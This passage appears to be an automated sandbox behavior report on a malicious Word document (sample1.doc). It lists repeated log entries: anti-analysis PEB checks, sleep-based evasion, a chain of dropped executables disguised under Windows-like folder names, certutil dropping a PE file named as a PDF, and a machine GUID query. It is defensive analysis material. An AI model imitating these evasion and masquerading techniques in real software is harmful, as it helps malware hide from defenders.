                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: sample1.docStream path 'Data' entropy: 7.97862280177 (max. 8.0)

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_8-6262
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_7-10197
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_9-6366
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_13-6366
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_10-6092
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_11-6345
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_12-6327
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,7_2_003F5040
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,8_2_00365040
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,9_2_003B5040
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,10_2_007B5040
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,11_2_002B5040
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,12_2_003E5040
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,13_2_00325040
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeCode function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,14_2_00625040
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeWindow / User API: threadDelayed 9920Jump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeWindow / User API: threadDelayed 9631Jump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeWindow / User API: threadDelayed 369Jump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeWindow / User API: threadDelayed 9912Jump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeWindow / User API: threadDelayed 9929Jump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeWindow / User API: threadDelayed 9899Jump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeWindow / User API: threadDelayed 9884Jump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeWindow / User API: threadDelayed 9522Jump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeWindow / User API: threadDelayed 478Jump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeWindow / User API: threadDelayed 468Jump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeWindow / User API: threadDelayed 5127Jump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeWindow / User API: threadDelayed 9524Jump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeWindow / User API: threadDelayed 476Jump to behavior
                      Source: C:\Windows\System32\certutil.exeDropped PE file which has not been started: C:\Users\Public\Ksh1.pdfJump to dropped file
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exe TID: 600Thread sleep count: 9631 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exe TID: 600Thread sleep count: 369 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exe TID: 2296Thread sleep count: 9912 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exe TID: 2296Thread sleep count: 88 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exe TID: 2108Thread sleep count: 9929 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exe TID: 2108Thread sleep count: 71 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exe TID: 2940Thread sleep count: 9899 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exe TID: 2940Thread sleep count: 101 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exe TID: 1820Thread sleep count: 9884 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exe TID: 1820Thread sleep count: 116 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exe TID: 2300Thread sleep count: 9522 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exe TID: 2300Thread sleep count: 478 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exe TID: 2732Thread sleep count: 468 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exe TID: 2732Thread sleep count: 5127 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exe TID: 2068Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,7_2_003F38F0
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeCode function: 8_2_003638F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,8_2_003638F0
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeCode function: 9_2_003B38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,9_2_003B38F0
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeCode function: 10_2_007B38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,10_2_007B38F0
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeCode function: 11_2_002B38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,11_2_002B38F0
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeCode function: 12_2_003E38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,12_2_003E38F0
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeCode function: 13_2_003238F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,13_2_003238F0
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeCode function: 14_2_006238F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,14_2_006238F0
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_004838F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,15_2_004838F0
                      Source: SampleRes.exe, 0000000A.00000002.2271114841.000000000058F000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_003F4DF0 mov eax, dword ptr fs:[00000030h]7_2_003F4DF0
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_003F3F00 mov eax, dword ptr fs:[00000030h]7_2_003F3F00
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeCode function: 8_2_00363F00 mov eax, dword ptr fs:[00000030h]8_2_00363F00
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeCode function: 8_2_00364DF0 mov eax, dword ptr fs:[00000030h]8_2_00364DF0
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeCode function: 9_2_003B3F00 mov eax, dword ptr fs:[00000030h]9_2_003B3F00
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeCode function: 9_2_003B4DF0 mov eax, dword ptr fs:[00000030h]9_2_003B4DF0
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeCode function: 10_2_007B3F00 mov eax, dword ptr fs:[00000030h]10_2_007B3F00
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeCode function: 10_2_007B4DF0 mov eax, dword ptr fs:[00000030h]10_2_007B4DF0
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeCode function: 11_2_002B3F00 mov eax, dword ptr fs:[00000030h]11_2_002B3F00
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeCode function: 11_2_002B4DF0 mov eax, dword ptr fs:[00000030h]11_2_002B4DF0
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeCode function: 12_2_003E3F00 mov eax, dword ptr fs:[00000030h]12_2_003E3F00
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeCode function: 12_2_003E4DF0 mov eax, dword ptr fs:[00000030h]12_2_003E4DF0
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeCode function: 13_2_00323F00 mov eax, dword ptr fs:[00000030h]13_2_00323F00
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeCode function: 13_2_00324DF0 mov eax, dword ptr fs:[00000030h]13_2_00324DF0
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeCode function: 14_2_00623F00 mov eax, dword ptr fs:[00000030h]14_2_00623F00
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeCode function: 14_2_00624DF0 mov eax, dword ptr fs:[00000030h]14_2_00624DF0
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_00483F00 mov eax, dword ptr fs:[00000030h]15_2_00483F00
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_00484DF0 mov eax, dword ptr fs:[00000030h]15_2_00484DF0
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_003F9860 GetModuleFileNameW,SHGetFolderPathW,SHGetFolderPathW,OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,SHGetFolderPathW,SHGetFolderPathW,7_2_003F9860
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess created: C:\Windows\SysWOW64\srclient\auditpolmsg.exe C:\Windows\SysWOW64\srclient\auditpolmsg.exeJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess created: C:\Windows\SysWOW64\mfc110\wcnwiz.exe C:\Windows\SysWOW64\mfc110\wcnwiz.exeJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess created: C:\Windows\SysWOW64\capiprovider\SampleRes.exe C:\Windows\SysWOW64\capiprovider\SampleRes.exeJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exe C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess created: C:\Windows\SysWOW64\KBDNO\mfc140.exe C:\Windows\SysWOW64\KBDNO\mfc140.exeJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess created: C:\Windows\SysWOW64\advapi32\ieframe.exe C:\Windows\SysWOW64\advapi32\ieframe.exeJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess created: C:\Windows\SysWOW64\nshipsec\cryptdll.exe C:\Windows\SysWOW64\nshipsec\cryptdll.exeJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess created: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exe C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_003F80A0 SetFileInformationByHandle,GetSystemTimeAsFileTime,_snwprintf,GetProcessHeap,HeapFree,CreateFileW,CreateFileW,CloseHandle,7_2_003F80A0
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_004853D0 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,15_2_004853D0
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

